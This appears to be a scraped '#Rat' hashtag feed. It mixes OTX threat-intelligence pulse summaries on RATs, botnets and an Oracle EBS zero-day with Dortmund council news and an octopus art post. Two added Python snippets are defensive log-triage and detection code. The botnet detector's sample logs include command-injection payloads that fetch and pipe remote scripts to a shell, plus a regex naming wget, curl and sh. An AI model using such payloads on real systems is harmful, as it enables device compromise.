From infostealer to full RAT: dissecting the PureRAT attack chain

An investigation into what appeared at first glance to be a “standard” Python-based infostealer campaign took an interesting turn when it was discovered to culminate in the deployment of a full-featured, commercially available remote access trojan (RAT) known as PureRAT.

Pulse ID: 68e96e29b73e5334019b8810
Pulse Link: https://otx.alienvault.com/pulse/68e96e29b73e5334019b8810
Pulse Author: AlienVault
Created: 2025-10-10 20:35:52

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #OTX #OpenThreatExchange #Python #RAT #RemoteAccessTrojan #Trojan #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

The ClickFix Factory: First Exposure of IUAM ClickFix Generator

We have uncovered a phishing kit named the IUAM ClickFix Generator that automates the creation of these attacks. The kit is designed to generate highly customizable phishing pages that lure victims by mimicking browser verification challenges often used to block automated traffic. It includes advanced features such as operating system detection and clipboard injection, enabling low-effort, cross-platform malware deployment.

Pulse ID: 68e94967bcab143b278f0611
Pulse Link: https://otx.alienvault.com/pulse/68e94967bcab143b278f0611
Pulse Author: AlienVault
Created: 2025-10-10 17:59:02

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Clipboard #CyberSecurity #InfoSec #Malware #Mimic #OTX #OpenThreatExchange #Phishing #RAT #bot #AlienVault


Crimson Collective: A New Threat Group Observed Operating in the Cloud

Over the past few weeks, Rapid7 has observed increased activity of a new threat group attacking AWS cloud environments with the goal of data exfiltration and subsequent extortion of the victim. This threat group refers to itself as ‘Crimson Collective’ and has recently announced that it is behind an attack on Red Hat, wherein it claims to have stolen private repositories from Red Hat’s GitLab.

Pulse ID: 68e93e6f7b450153bae6599b
Pulse Link: https://otx.alienvault.com/pulse/68e93e6f7b450153bae6599b
Pulse Author: AlienVault
Created: 2025-10-10 17:12:14

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #Cloud #CyberSecurity #ELF #Extortion #InfoSec #OTX #OpenThreatExchange #RAT #Rapid7 #bot #AlienVault

The B54 bridge link between Phoenix-West and Rombergpark will not be built after all. The #Rat (city council) doubts the usefulness of the project and has stopped it. #Dortmund #Politik #Verkehr #Mobilität
https://www.nordstadtblogger.de/brueckenschlag-b54-zwischen-phoenix-west-und-rombergpark-wird-jetzt-doch-nicht-kommen/
B54 bridge link between Phoenix-West and Rombergpark will not be built after all - Nordstadtblogger

The B54 bridge link was meant to be a barrier-free connection between Rombergpark and Phoenix West. The project, which goes back to plans from 2009, was stopped by the Dortmund city council on 9 October. Before that, …

Nordstadtblogger
The Dortmund #Stadtrat (city council) swears in Birgit Zoerner's successor: Frauke Füsers becomes the new deputy mayor (Beigeordnete) for Labour, Health, Social Affairs, Sport and Leisure. #Dortmund #Politik #Rat #Soziales
https://www.nordstadtblogger.de/frauke-fuesers-wird-neue-beigeordnete-fuer-arbeit-gesundheit-soziales-sport-und-freizeit/
Frauke Füsers becomes the new deputy mayor for Labour, Health, Social Affairs, Sport and Leisure - Nordstadtblogger

The Council of the City of Dortmund has sworn in Frauke Füsers as the new deputy mayor (Beigeordnete) for Labour, Health, Social Affairs, Sport and Leisure. The 40-year-old takes office in November and succeeds Birgit Zoerner, who held the department …

Nordstadtblogger

Oracle E-Business Suite Zero-Day Exploited in Widespread Extortion Campaign

A large-scale extortion campaign targeting Oracle E-Business Suite (EBS) customers began on September 29, 2025. The threat actor, claiming affiliation with the CL0P extortion brand, exploited a zero-day vulnerability (CVE-2025-61882) in EBS as early as August 9, 2025. The campaign involved sending emails to executives, alleging data theft from EBS environments. The attackers used a multi-stage Java implant framework to compromise Oracle EBS, exploiting vulnerabilities in the UiServlet and SyncServlet components. The attack chain included GOLDVEIN.JAVA downloader and SAGE* infection chain. While not formally attributed, the activity shows overlaps with confirmed and suspected FIN11 operations. The campaign highlights the ongoing trend of exploiting zero-day vulnerabilities in enterprise applications for data theft and extortion.

Pulse ID: 68e826492c3a91b3abe8c6b9
Pulse Link: https://otx.alienvault.com/pulse/68e826492c3a91b3abe8c6b9
Pulse Author: AlienVault
Created: 2025-10-09 21:16:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cl0p #CyberSecurity #DataTheft #Email #Extortion #InfoSec #Java #OTX #OpenThreatExchange #RAT #Vulnerability #ZeroDay #bot #AlienVault
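The pulse names two EBS components, UiServlet and SyncServlet, as the entry points. A first-pass triage of Oracle HTTP Server access logs for requests reaching those servlets is the check a responder would run before anything else. The following is an added example, not code from the pulse or from the Oracle/Mandiant reporting; the log lines are constructed, and the `/OA_HTML/...` prefixes are assumed (matching is on the servlet name so the prefix does not matter):

```python
import re
from collections import defaultdict

# Constructed sample of Oracle HTTP Server access log lines (combined format).
# Not real traffic; IPs are from documentation ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2025:09:12:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.45 - - [01/Oct/2025:09:13:22 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 812 "-" "python-requests/2.31"
203.0.113.45 - - [01/Oct/2025:09:13:24 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 41 "-" "python-requests/2.31"
10.0.0.7 - - [01/Oct/2025:09:14:00 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Oct/2025:09:15:10 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 500 0 "-" "curl/8.4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Servlet names from the report. The exact URL prefixes under /OA_HTML are an
# assumption here; matching on the servlet name keeps the check prefix-agnostic.
WATCHED_SERVLETS = ("UiServlet", "SyncServlet")


def is_internal(ip):
    """RFC 1918 check; adjust to the environment's real ingress ranges."""
    return bool(re.match(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)", ip))


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def watched_servlet(path):
    """Return the watched servlet a request path ends in, or None."""
    bare = path.split("?", 1)[0]
    return next((s for s in WATCHED_SERVLETS if bare.endswith("/" + s)), None)


def triage(log_text):
    """Group servlet hits per source IP and rank the sources worth a closer look."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        servlet = watched_servlet(rec["path"])
        if servlet:
            hits[rec["ip"]].append((rec["ts"], rec["method"], servlet, rec["status"], rec["ua"]))

    findings = []
    for ip, events in hits.items():
        findings.append({
            "ip": ip,
            "external": not is_internal(ip),
            "servlets": sorted({e[2] for e in events}),
            "requests": len(events),
            # Non-browser clients talking to an interactive servlet are worth a look.
            "scripted_client": any(not e[4].startswith("Mozilla") for e in events),
        })
    # Heuristic ranking: external sources that touched both servlets come first.
    findings.sort(key=lambda f: (-len(f["servlets"]), not f["external"], f["ip"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The ranking is a triage heuristic, not a verdict: legitimate traffic does reach these servlets, so the output is a list of sources to pull full request bodies and response sizes for, with external, scripted clients that hit both components at the top.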


From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits

A large-scale RondoDox botnet campaign has been identified, exploiting over 50 vulnerabilities across more than 30 vendors. The campaign targets internet-exposed infrastructure, including routers, DVRs, NVRs, CCTV systems, and web servers. It began with exploiting a vulnerability from Pwn2Own Toronto 2022 and has since expanded its arsenal. The campaign uses an 'exploit shotgun' approach, attempting multiple exploits simultaneously. Organizations are at risk of data exfiltration, persistent network compromise, and operational disruption. Prioritizing patching, conducting regular vulnerability assessments, segmenting networks, and continuous monitoring are recommended as proactive security measures.

Pulse ID: 68e86b551440846b11a598a1
Pulse Link: https://otx.alienvault.com/pulse/68e86b551440846b11a598a1
Pulse Author: AlienVault
Created: 2025-10-10 02:11:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #OTX #OpenThreatExchange #RAT #Vulnerability #bot #botnet #AlienVault
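The "exploit shotgun" behaviour described above (many different exploits thrown at one target in a burst) is detectable on the receiving side without knowing which of the 50-plus vulnerabilities is in play: one source hitting several distinct exploit-like endpoints within a short window looks nothing like a brute-force retry of a single payload. The following is an added example, not code from the pulse or from the RondoDox analysis; the events and the placeholder paths are constructed, and the command-injection regex is a generic heuristic, not the campaign's signatures:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample events (ISO timestamp, source IP, request line) as a web
# honeypot or reverse proxy might log them. Paths are generic placeholders,
# not the campaign's real exploit URIs.
SAMPLE_EVENTS = [
    ("2025-10-09T02:00:00", "198.51.100.23", "GET /device/cmd.cgi?c=;wget+http://198.51.100.23/a.sh HTTP/1.1"),
    ("2025-10-09T02:00:01", "198.51.100.23", "POST /api/v1/ping?host=$(curl+198.51.100.23/a.sh|sh) HTTP/1.1"),
    ("2025-10-09T02:00:02", "198.51.100.23", "GET /setup/run?cmd=%7Csh HTTP/1.1"),
    ("2025-10-09T02:00:04", "198.51.100.23", "GET /dvr/export?file=%60chmod+777+/tmp/a%60 HTTP/1.1"),
    ("2025-10-09T02:00:05", "198.51.100.23", "GET /index.html HTTP/1.1"),
    # One payload retried against the same endpoint: noisy, but not a shotgun.
    ("2025-10-09T02:10:00", "203.0.113.8", "GET /device/cmd.cgi?c=;wget+http://203.0.113.8/b.sh HTTP/1.1"),
    ("2025-10-09T02:10:02", "203.0.113.8", "GET /device/cmd.cgi?c=;wget+http://203.0.113.8/b.sh HTTP/1.1"),
    ("2025-10-09T02:10:04", "203.0.113.8", "GET /device/cmd.cgi?c=;wget+http://203.0.113.8/b.sh HTTP/1.1"),
    ("2025-10-09T02:20:00", "10.1.1.4", "GET /login.html HTTP/1.1"),
    ("2025-10-09T02:20:03", "10.1.1.4", "POST /login.cgi HTTP/1.1"),
]

# Command-injection tells, checked after URL-decoding. A constructed heuristic;
# a real deployment would add vendor-specific exploit signatures.
INJECTION_RE = re.compile(r"(;|\||`|\$\(|\bwget\b|\bcurl\b|/bin/sh|\bchmod\b)")


def request_path(request_line):
    parts = request_line.split(" ")
    return parts[1] if len(parts) >= 2 else None


def looks_like_exploit(request_line):
    return INJECTION_RE.search(unquote(request_line)) is not None


def find_shotgun_sources(events, window_seconds=60, min_distinct=3):
    """Return {source: max distinct exploit-like endpoints hit within one window}
    for every source reaching min_distinct. Retrying one endpoint never counts."""
    by_src = defaultdict(list)
    for ts, src, request_line in events:
        path = request_path(request_line)
        if path is None or not looks_like_exploit(request_line):
            continue
        # Key on the endpoint, not the full query, so payload variants of the
        # same exploit are one attempt.
        by_src[src].append((datetime.fromisoformat(ts), path.split("?", 1)[0]))

    flagged = {}
    for src, hits in by_src.items():
        hits.sort()
        window = deque()
        best = 0
        for ts, endpoint in hits:
            window.append((ts, endpoint))
            while ts - window[0][0] > timedelta(seconds=window_seconds):
                window.popleft()
            best = max(best, len({e for _, e in window}))
        if best >= min_distinct:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    print(find_shotgun_sources(SAMPLE_EVENTS))  # {'198.51.100.23': 4}
```

Counting distinct endpoints rather than raw request volume is what separates the shotgun from ordinary scanning noise; the window and threshold are tuning knobs and the values here are illustrative.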


AdaptixC2 Uncovered: Capabilities, Tactics & Hunting Strategies

AdaptixC2 is a lightweight, modular command-and-control framework designed for flexibility and customization. The analysis reveals its sophisticated capabilities, including multi-protocol communication, advanced evasion techniques, and a BOF execution system for extensibility. The discovery of 102 active servers across multiple countries indicates widespread operational use, with attackers leveraging legitimate cloud infrastructure. The framework's support for HTTP, SMB, and TCP protocols creates diverse attack vectors, while its dynamic API resolution and encryption techniques challenge traditional detection methods. Built-in operational security features and lateral movement capabilities demonstrate its effectiveness for long-term persistence and network penetration. The exposed infrastructure and configuration patterns provide valuable intelligence for proactive defense and threat hunting activities.

Pulse ID: 68e82645eb2f88f5e620c2ae
Pulse Link: https://otx.alienvault.com/pulse/68e82645eb2f88f5e620c2ae
Pulse Author: AlienVault
Created: 2025-10-09 21:16:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CyberSecurity #Encryption #HTTP #ICS #InfoSec #LUA #OTX #OpenThreatExchange #RAT #SMB #TCP #bot #AlienVault


ClayRat: A New Android Spyware Targeting Russia

ClayRat is a rapidly evolving Android spyware campaign primarily targeting Russian users. Distributed through Telegram channels and phishing sites, it masquerades as popular apps to lure victims. The spyware can exfiltrate SMS messages, call logs, notifications, and device information, as well as take photos and send SMS messages. It spreads aggressively by sending malicious links to the victim's contacts. Over 600 samples and 50 droppers have been observed in three months, with each iteration adding new obfuscation techniques. ClayRat abuses Android's default SMS handler role to bypass permission prompts and gain access to sensitive data. The campaign combines impersonation of trusted services, community distribution via Telegram, UX-level deception, and self-propagation through mass SMS forwarding.

Pulse ID: 68e8c12eb7ebbc52304b33bc
Pulse Link: https://otx.alienvault.com/pulse/68e8c12eb7ebbc52304b33bc
Pulse Author: AlienVault
Created: 2025-10-10 08:17:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #CyberSecurity #ELF #InfoSec #OTX #OpenThreatExchange #Phishing #RAT #Russia #Rust #SMS #SpyWare #Telegram #bot #AlienVault


For #WorldOctopusDay 🐙on a #Woodensday:
#Octopus and #Rat by Kuki Sii, Tongan artist
wood carving w/ shell
Sydney, Australia c.1970
+
The Rat and the Octopus book by Temukisa Lelemia, Ill. by Murray Grimsdale
Wellington, NewZealand 1998

seen on display at AMNH NYC

#CephalopodAwarenessDays